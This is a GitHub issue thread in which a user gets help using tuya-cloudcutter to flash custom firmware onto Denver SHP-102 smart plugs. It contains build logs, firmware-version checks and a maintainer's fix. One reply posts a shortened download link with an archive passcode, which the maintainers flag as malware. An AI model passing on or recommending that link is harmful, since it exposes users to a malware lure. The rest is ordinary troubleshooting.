tuya-cloudcutter/tuya-cloudcutter #702: Denver SHP-102 can't exploit

JonasJR, 2024-09-05:
I realized that I had two Denver SHP-102 that was collecting dust in the basement so I picked them up and checked that they still worked. I then wanted to connect them to the Home Assistant that I didn't have when I bought them and realized I needed to flash this new firmware to make it work. However I can't seem to get it to flash. This is the logs I get:
```Building cloudcutter docker image
[+] Building 0.7s (13/13) FINISHED                                                                                                                                                                                                                                                                                                                                             docker:default
 => [internal] load build definition from Dockerfile                                                                                                                                                                                                                                                                                                                                     0.0s
 => => transferring dockerfile: 462B                                                                                                                                                                                                                                                                                                                                                     0.0s
 => [internal] load metadata for docker.io/library/python:3.9.18-slim-bullseye                                                                                                                                                                                                                                                                                                           0.7s
 => [internal] load .dockerignore                                                                                                                                                                                                                                                                                                                                                        0.0s
 => => transferring context: 2B                                                                                                                                                                                                                                                                                                                                                          0.0s
 => [base 1/2] FROM docker.io/library/python:3.9.18-slim-bullseye@sha256:9ac27d4ecadc3ef02f980a8e2b37c7e8cdbf24039c5eddd9f98aff00d23b9e03                                                                                                                                                                                                                                                0.0s
 => [internal] load build context                                                                                                                                                                                                                                                                                                                                                        0.0s
 => => transferring context: 3.02kB                                                                                                                                                                                                                                                                                                                                                      0.0s
 => CACHED [base 2/2] RUN apt-get -qq update && apt-get install -qy --no-install-recommends git hostapd rfkill dnsmasq build-essential libssl-dev iproute2 mosquitto                                                                                                                                                                                                                     0.0s
 => CACHED [python-deps 1/4] RUN pip install --upgrade pipenv                                                                                                                                                                                                                                                                                                                            0.0s
 => CACHED [python-deps 2/4] COPY src/Pipfile /src/                                                                                                                                                                                                                                                                                                                                      0.0s
 => CACHED [python-deps 3/4] COPY src/Pipfile.lock /src/                                                                                                                                                                                                                                                                                                                                 0.0s
 => CACHED [python-deps 4/4] RUN cd /src && PIPENV_VENV_IN_PROJECT=1 pipenv install --deploy                                                                                                                                                                                                                                                                                             0.0s
 => CACHED [cloudcutter 1/2] COPY src /src                                                                                                                                                                                                                                                                                                                                               0.0s
 => CACHED [cloudcutter 2/2] WORKDIR /src                                                                                                                                                                                                                                                                                                                                                0.0s
 => exporting to image                                                                                                                                                                                                                                                                                                                                                                   0.0s
 => => exporting layers                                                                                                                                                                                                                                                                                                                                                                  0.0s
 => => writing image sha256:967576d51f0bf9712d034402c3ef6db697b3884eedaf4e70a9659f83706727e1                                                                                                                                                                                                                                                                                             0.0s
 => => naming to docker.io/library/cloudcutter                                                                                                                                                                                                                                                                                                                                           0.0s
Successfully built docker image
1) Detach from the cloud and run Tuya firmware locally
2) Flash 3rd Party Firmware
[?] Select your desired operation [1/2]: 2
Loading options, please wait...
[?] How do you want to choose the device?: By manufacturer/device name
 ► By manufacturer/device name
   By firmware version and name
   From device-profiles (i.e. custom profile)

[?] Select the brand of your device: Denver
   Chanfok
   Cloudy Bay
   Conecto
   Crabtek
[... cut ...]
Worth noting is that when I'm asked to power cycle the device I have tried with both holding the power button for 5seconds until it starts flashing slowly and also tried to disconnect power entirely, but nothing seems to make a difference... I have done this with BOTH of the devices and they still show up in the Denver Smart app and work as they had before... I have also tried this on both a Ubuntu VM on my mac with a WiFi dongle connected, and on my stationary computer with a hardware installation of Ubuntu with integrated WiFi module on the motherboard, but both setups are giving me the exact same result... I'm getting a bit frustrated and very confused so any clue on what I can try next?

RamonAlvesPS, 2024-09-05:
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

Cossid, 2024-09-05:
Do not download the above (hidden) link, it appears to be a virus/malware and has been reported.

JonasJR, 2024-09-05:
> Do not download the above (hidden) link, it appears to be a virus/malware and has been reported.

Yes, I have reported also :)

Cossid, 2024-09-05:
Depending on the age, you may have older non-Beken hardware.

I'd start with https://github.com/tuya-cloudcutter/tuya-cloudcutter/wiki/FAQ#im-not-sure-what-module-is-in-my-device-how-do-i-find-out to narrow down which module type you may have.

If it does appear to be Beken, I'd move to https://github.com/tuya-cloudcutter/tuya-cloudcutter/wiki/FAQ#how-do-i-find-out-what-firmware-version-my-device-has to find out which firmware version your device has.

JonasJR, 2024-09-05:
> Depending on the age, you may have older non-Beken hardware.
>
> I'd start with https://github.com/tuya-cloudcutter/tuya-cloudcutter/wiki/FAQ#im-not-sure-what-module-is-in-my-device-how-do-i-find-out [...]

Ok, so I have checked the MAC and it says Tuya Smart Inc so it should be Beken or Realtek (not sure witch yet). So I went on and checked the firmware at the "Check for Firmware Upgrade" (It was not the exact same place that the guide showed, but this is the only one I can find in my app) and that says:
```
Wi-Fi Module: V1.3.5
MCU Module: V1.3.5
```
So then the question is. Does this make my devices Realtek or Beken?

Cossid, 2024-09-05:
It's almost surely Beken.  Unfortunately, 1.3.5 is on the [known patched list](https://github.com/tuya-cloudcutter/tuya-cloudcutter/wiki/Known-Patched-Firmware)

closed 2024-09-05 by Cossid

Cossid, 2024-09-05:
There is a chance yours is the older BK7231T instead of BK7231N though, in which case try by version / firmware and search for the 1.3.5 version with something like `oem_bk7231s_dltj` in the name and see if that works.

JonasJR, 2024-09-06:
Lucky me! It turned out to be one of the old BK7231T and the 
```
► 1.3.5 - BK7231T / oem_bk7231s_dltj
```
worked just fine for both of the plugs!
Thank you so much @Cossid for the help! <3